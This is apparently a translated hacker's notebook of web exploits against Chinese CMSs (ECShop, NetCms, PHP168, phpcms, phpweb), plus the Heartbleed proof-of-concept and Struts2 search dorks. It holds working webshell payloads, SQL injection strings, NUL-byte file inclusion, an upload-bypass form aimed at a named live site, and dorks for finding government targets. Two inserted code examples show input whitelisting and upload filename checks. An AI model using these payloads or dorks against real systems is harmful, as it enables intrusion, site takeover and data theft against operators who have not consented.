require(dirname(dirname(__FILE__)) . '/data/config.php');
header('Content-type: application/x-javascript; charset=' . EC_CHARSET);
include_once('../languages/' . $lang . '/calendar.php'); // the include happens here; the path needs to be truncated

Test code:

// requires magic_quotes_gpc = Off
/js/calendar.php?lang=../index.php%00.   (note the trailing dot)

Exploitation: first register a user, then upload a GIF file with a GIF89a header as a decoy, then include it. Payload:

http://localhost/js/calendar.php?lang=../data/feedbackimg/6_20101228vyrpbg.gif%00
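The calendar.php snippet above builds an include path directly from $_GET['lang'], and the file_exists check does not help because the NUL byte truncates the path on both the check and the include. The fix is to never let raw input reach the path at all: resolve the requested code against a fixed list of known languages and fall back to the default otherwise. The following is an added example, not ECShop code; the list of available languages and the base directory are constructed for the demonstration.

```php
<?php
// Added example, not ECShop code: resolving a user-supplied language code
// against a fixed whitelist before it is used in an include path.
// Runs stand-alone with the PHP CLI; no files are actually included.

const DEFAULT_LANG = 'zh_cn';

/**
 * Return a language code that is safe to use in a path. Only codes present in
 * $available (a fixed list, e.g. the known subdirectories of languages/) are
 * accepted; path traversal, NUL bytes, mixed case and unknown codes all fall
 * back to DEFAULT_LANG instead of being "cleaned up".
 */
function resolve_lang(string $requested, array $available): string
{
    $requested = trim($requested);
    // Strict shape check first: lowercase letters, digits and underscore only,
    // so a NUL byte or a slash can never pass regardless of the whitelist.
    if (!preg_match('/^[a-z0-9_]{2,16}\z/', $requested)) {
        return DEFAULT_LANG;
    }
    return in_array($requested, $available, true) ? $requested : DEFAULT_LANG;
}

/** Build the include path from the resolved code, never from the raw request. */
function lang_file(string $requested, array $available, string $base = '../languages'): string
{
    return $base . '/' . resolve_lang($requested, $available) . '/calendar.php';
}

$available = ['zh_cn', 'zh_tw', 'en_us'];   // constructed list of shipped languages

echo lang_file('en_us', $available), "\n";                        // ../languages/en_us/calendar.php
echo lang_file("../index.php\0.", $available), "\n";              // ../languages/zh_cn/calendar.php
echo lang_file('../data/feedbackimg/x.gif', $available), "\n";    // ../languages/zh_cn/calendar.php
echo lang_file('EN_US', $available), "\n";                        // ../languages/zh_cn/calendar.php
```

The whitelist is the actual control; the regular expression in front of it only guarantees that nothing path-like is ever compared or logged. Keeping the language list as a literal (or reading it once from the languages/ directory at startup) means adding a language is a one-line change while the include path stays fully static.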


ECShop absolute-path disclosure bug 0day

/ECShop/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php

  


ECShop back-end shell


SQL statement execution


create table a(cmd text not null);


 insert into a(cmd) values('<?php eval($_POST[cmd]);?>');


select cmd from a into outfile '<export path>';


drop table if exists a;


Method two:

The database backup feature in the ECShop back end

------------------------------------------------------------------------------------------------------

netcms

Vulnerable web application: NetCms website management system

The vulnerability is in the site registration page: /user/login.aspx

1. First, search Baidu or Google for the keyword: "NetCms网站管理系统"


intitle:NetCms网站管理系统


2. Then pick any site, go to /user/login.aspx and click register.

user/Register.aspx


q7170610


Userfiles/477187224365/8fc83811c47c6de6x.aspx

3. After registering, log in to the account; once logged in, on the post-article page

click "Select image"

  


Here, note down this directory name, /Userfiles/486202957767; this is the directory where your attachments are saved.

Then in the site messages section, send yourself a site message and upload the webshell directly as the attachment.


  


Then click send message

  


Then go back to management, find the outbox, and look at the name of the webshell we sent

  


The webshell file name is: a40a3393c76655f41.asp

PS: you can simply right-click to save the webshell file and see its file name

  

So the full path of our shell is /Userfiles/486202957767/a40a3393c76655f41.asp, and that is how simply the site's webshell is obtained.

-------------------------------------------------------------------------------------

openssl

#!/usr/bin/python


# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)

# The author disclaims copyright to this source code.


import sys

import struct

import socket

import time

import select

import re

from optparse import OptionParser


options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')

options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')


def h2bin(x):

    return x.replace(' ', '').replace('\n', '').decode('hex')


hello = h2bin('''

16 03 02 00  dc 01 00 00 d8 03 02 53

43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf

bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00

00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88

00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c

c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09

c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44

c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c

c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11

00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04

03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19

00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08

00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13

00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00

00 0f 00 01 01                                  

''')


hb = h2bin(''' 

18 03 02 00 03

01 40 00

''')


def hexdump(s):

    for b in xrange(0, len(s), 16):

        lin = [c for c in s[b : b + 16]]

        hxdat = ' '.join('%02X' % ord(c) for c in lin)

        pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)

        print '  %04x: %-48s %s' % (b, hxdat, pdat)

    print


def recvall(s, length, timeout=5):

    endtime = time.time() + timeout

    rdata = ''

    remain = length

    while remain > 0:

        rtime = endtime - time.time() 

        if rtime < 0:

            return None

        r, w, e = select.select([s], [], [], 5)

        if s in r:

            data = s.recv(remain)

            # EOF?

            if not data:

                return None

            rdata += data

            remain -= len(data)

    return rdata

        


def recvmsg(s):

    hdr = recvall(s, 5)

    if hdr is None:

        print 'Unexpected EOF receiving record header - server closed connection'

        return None, None, None

    typ, ver, ln = struct.unpack('>BHH', hdr)

    pay = recvall(s, ln, 10)

    if pay is None:

        print 'Unexpected EOF receiving record payload - server closed connection'

        return None, None, None

    print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))

    return typ, ver, pay


def hit_hb(s):

    s.send(hb)

    while True:

        typ, ver, pay = recvmsg(s)

        if typ is None:

            print 'No heartbeat response received, server likely not vulnerable'

            return False


        if typ == 24:

            print 'Received heartbeat response:'

            hexdump(pay)

            if len(pay) > 3:

                print 'WARNING: server returned more data than it should - server is vulnerable!'

            else:

                print 'Server processed malformed heartbeat, but did not return any extra data.'

            return True


        if typ == 21:

            print 'Received alert:'

            hexdump(pay)

            print 'Server returned error, likely not vulnerable'

            return False


def main():

    opts, args = options.parse_args()

    if len(args) < 1:

        options.print_help()

        return


    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    print 'Connecting...'

    sys.stdout.flush()

    s.connect((args[0], opts.port))

    print 'Sending Client Hello...'

    sys.stdout.flush()

    s.send(hello)

    print 'Waiting for Server Hello...'

    sys.stdout.flush()

    while True:

        typ, ver, pay = recvmsg(s)

        if typ == None:

            print 'Server closed connection without sending Server Hello.'

            return

        # Look for server hello done message.

        if typ == 22 and ord(pay[0]) == 0x0E:

            break


    print 'Sending heartbeat request...'

    sys.stdout.flush()

    s.send(hb)

    hit_hb(s)


if __name__ == '__main__':

    main()

------------------------------------------------------------------------------------------

php168

V6.02   

/member/post.php?only=1&showHtml_Type[bencandy][1]={${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))}}&aid=1&job=endHTML

Generates member/c.php directly in that directory; the password is c

------------------------------------------------------------------------------------------

phpcms

phpcmsv9


index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php


phpcms 2008 local file inclusion


phpcms local-inclusion-type vulnerability: if the file includes /include/common.inc.php, many files that normally only run from the back end can be included and executed.


Because of phpcms's global-variable mechanism there are many ways to get a shell, and there is more than one issue of this kind.


The admin/safe.inc.php file is the back-end webshell scanner, but unfortunately, although the file is named safe, it is not safe at all.


Publishing a local-inclusion method that gets a shell instantly.


Include the admin/safe.inc.php file and submit the following data via GET

A one-liner shell will be generated in the root directory

Using the key obtained in the previous post, $key='sIpeofogblFVCildZEwe';

encrypt the following string


$evil='i=1&m=1&f=fuck&action=edit_code&file_path=evil.php&code=<?eval($_POST[a])?>&mod=../../admin/safe.inc.php%00';


http://127.0.0.1/n/phpcms/play.php?a_k=GnRBQwJbXkEEUSAjIAJKBTkxHgoddBUBBhIwBA0II3AlAAABBTUWERt0FRMGCkEXChxgNSwNCVlmehITEiVYQTA2IDQ2NycLalZSQjcqE1hdZ19LQUkOAw8FKHkwCAoBdCwZBl05GBVKVl8=


A one-liner webshell will be generated in the root directory


Likewise, the arbitrary file deletion vulnerability:

$evil='i=1&m=1&f=fuck&action=del_file&files=robots.txt&mod=../../admin/safe.inc.php%00';


http://127.0.0.1/n/phpcms/play.php?a_k=GnRBQwJbXkEEUSAjIAJKBTkxHgoddBQAAzkJDg4JYDAqBQkXZzcYBxw9A0sbHhtBDwMia21HQ0p0ahYBHiAeShwHCQJMBSg1bRkEFH91Rw==


--------------------------------------------------------------------------------------------

phpweb

admin' or '1'='1  universal password

inurl:/class/?1.html


inurl:webmall/query.php?typeid=?

inurl:shop/class/?226.html

inurl:product/html/?10.html

inurl:down/class/?2.html

inurl:news/html/?417.html

inurl:shop/html/?477.html

inurl:news/class/?86.html


inurl:/page/html/?1.html

exp   /search/index.php?imageField.x=-1138&imageField.y=-319&key=1%27

inurl:class/index.php?catid=0

exp   /3149_4369/product/html/?78'and(select/**/1/**/from(select/**/count(*),concat((select/**/(select/**/(select/**/concat(0x27,0x7e,user,0x27,0x7e,password,0x27,0x7e)/**/from/**/dev_base_admin/**/limit/**/0,1))/**/from/**/information_schema.tables/**/limit/**/0,1),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)/*.html


Keyword: inurl:down/class/index.php?myord=


Backend address: admin.php


Universal password: admin 'or '1'='1


Injection URL: down/class/index.php?myord=1


Keyword: inurl:webmall/detail.php?id


Data table: pwn_base_admin


关键字:inurl:webmall/detail.php?id


数据表:pwn_base_admin

 

phpWebSite search module cross-site scripting vulnerability

Affected systems:


Appalachian State University phpWebSite 1.4.0


phpWebSite is a website content management system (CMS).

Exploitation method

index.php?module=search&user=search&search=%22%3E%3Ch1%3EXSS%3C%2Fh1%3E&alternate=local&mod_title=all&submit=Search



phpweb finished-website latest version (injection, upload, writing a shell)


Vulnerable files:

inurl:search/module/search.php

inurl:search/index.php?key=1&myord=1 [sqlinjection]


base/install/index.php --data 

"dbhost=localhost&dbname=phpweb&dbuser=root&dbpwd=root&tablepre=pwn&nextstep=3&command=gonext&alertmsg=&username=" --header "HOST:localhost\";eval($_REQUEST[a]);#"

Shell address: /config.inc.php


inurl:shop/class/index.php?showbrandid=1 


AND (SELECT 1 FROM (SELECT count( * ) , concat((SELECT concat( 0x23, user, 0x7e,password, 0x23 ) FROM dev_base_admin limit 0,1),floor( rand( 0 ) *2 ))x FROM information_schema.tables GROUP BY x)a)--%20


All phpweb full-site packages have SQL injection in their pseudo-static pages.


Main site: http://phpweb.net/

Add a ' to test:


http://www.phpweb.net/down/html/?772'.html


Error,

so injection exists.

Spaces cannot be used, so /**/ has to be used instead.

http://www.phpweb.net/page/html/?56'/**/and/**/1=1/*.html   normal

http://www.phpweb.net/page/html/?56'/**/and/**/1=2/*.html   error.

Dump the database version:


http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html


phpweb IIS website management system: kedit editor upload

——————————————————————————————————————————————————————————

<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://www.hc-ib.net/kedit/upload_cgi/upload.php">

<input type="hidden" name="fileName" id="fileName" value="404.php.a;a.jpg" />

<input type="hidden" name="attachPath" id="fileName" value="news/pics/" />

 

<select id="imageType" onchange="javascript:parent.KindImageType(this.value);document.getElementById('KE_IMAGEsubmitButton').focus();">

<option value="1" selected="selected">本地</option>

<option value="2">远程</option>

</select>

 

<input type="text" id="imgLink" value="http://" maxlength="255" style="width:95%;border:1px solid #555555;display:none;" />

<input type="file" name="fileData" id="imgFile" size="14" style="border:1px solid #555555;" onclick="javascript:document.getElementById('imgLink').value='http://';" /></td>

 

<input type="text" name="imgTitle" id="imgTitle" value="" maxlength="100" style="width:95%;border:1px solid #555555;" />

<input type="text" name="imgWidth" id="imgWidth" value="0" maxlength="4" style="width:40px;border:1px solid #555555;" />

<input type="text" name="imgHeight" id="imgHeight" value="0" maxlength="4" style="width:40px;border:1px solid #555555;" />

<input type="text" name="imgBorder" id="imgBorder" value="0" maxlength="1" style="width:20px;border:1px solid #555555;" />

<select id="imgAlign" name="imgAlign">

<option value="">对齐方式</option>

<option value="baseline">baseline</option>

<option value="top">top</option>

<option value="middle">middle</option>

<option value="bottom">bottom</option>

<option value="texttop">texttop</option>

<option value="absmiddle">absmiddle</option>

<option value="absbottom">absbottom</option>

<option value="left">left</option>

<option value="right">right</option>

</select>

<input type="text" name="imgHspace" id="imgHspace" value="0" maxlength="1" style="width:20px;border:1px solid #555555;" />

<input type="text" name="imgVspace" id="imgVspace" value="0" maxlength="1" style="width:20px;border:1px solid #555555;" />

<input type="submit" name="button" id="KE_IMAGEsubmitButton" value="确定" style="border:1px solid #555555;background-color:#AAAAAA;" /></form>


After uploading, just right-click and view the page source to get the path of the uploaded file.

The part above was copied straight from the editor and modified; in fact it can also be done like this:


<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://www.hc-ib.net/kedit/upload_cgi/upload.php">

<input type="text" name="fileName" value="404.php.a;a.jpg" />

<input type="hidden" name="attachPath" value="news/pics/" />

<input type="file" name="fileData" size="14" /></td>

<input type="submit" name="button" value="确定" />

</form> 
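The fileName value 404.php.a;a.jpg in the forms above gets past a client-side extension check because IIS 6 stops parsing the path at the semicolon and executes the file as 404.php. The Python below is an added example (not kedit or phpweb code) of the server-side filename policy that closes this class of trick: reject any name that could be reinterpreted, then store the file under a generated name; the extension allowlist is an assumption.

```python
import os
import re
import secrets

# Added example, not kedit/phpweb code. ALLOWED_EXT is an assumed image
# allowlist; the upload directory must likewise be fixed server-side rather
# than taken from a client field such as the form's attachPath.
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}
SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]+$")


def check_upload_name(name):
    """Return (ok, reason) for a client-supplied filename.

    Rejects path separators, the IIS ';' terminator, NUL bytes and
    percent-encoding, multiple extensions (x.php.jpg) and any extension
    outside the allowlist."""
    base = os.path.basename(name.replace("\\", "/"))
    if base != name:
        return False, "path separator in filename"
    if any(c in base for c in ";\x00%"):
        return False, "reserved character (';', NUL or '%') in filename"
    parts = base.split(".")
    if len(parts) != 2:
        return False, "expected exactly one extension"
    stem, ext = parts
    if not SAFE_STEM.match(stem):
        return False, "stem contains disallowed characters"
    if ext.lower() not in ALLOWED_EXT:
        return False, "extension not in allowlist"
    return True, "ok"


def stored_name(name):
    """Never reuse the client name on disk: a random stem plus the validated,
    lower-cased extension so the original name cannot influence handling."""
    ok, reason = check_upload_name(name)
    if not ok:
        raise ValueError(reason)
    ext = name.rsplit(".", 1)[1].lower()
    return f"{secrets.token_hex(8)}.{ext}"


if __name__ == "__main__":
    for candidate in ("404.php.a;a.jpg", "shell.php.jpg", "photo_1.JPG"):
        print(candidate, "->", check_upload_name(candidate))
```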

---------------------------------------------------------------------------------------------

struts2

Keywords

intitle:客户管理平台 inurl:action


intitle:广东 inurl:detail.action


intitle:广东 inurl:Login.action


intitle:电视台 inurl:login.action


intitle:平台 inurl:login.action


intitle:车管所 filetype:action


intitle:网络电视台 inurl:action


intitle:车管所 inurl:action?id=


intitle:车管所 filetype:action


inurl:车管所 inurl:action


inurl:车管所 filetype:action


inurl:action  site:gov.cn


Inurl:index.action 


inurl:车管所 inurl:action?id=


Inurl:index.achtion   title: apache struts2


filetype:action  site:gov.cn


filetype inurl:action site:jp


Inurl:index.action    site: tw Inurl:index.action


Poet's Blog www.BlueNoob.com


Inurl:商城.achtion (many shopping-mall sites)


Inurl:action?id=

 

site:tw inurl:action


site:jp inurl:action


site:ko inurl:action


filetype:action site:jp


filetype:action site:fas.org   (for US sites)


filetype:action site:gov.<any country's abbreviation>


filetype:action site:edu.cn   


--------------------------------------------------------------------------------------

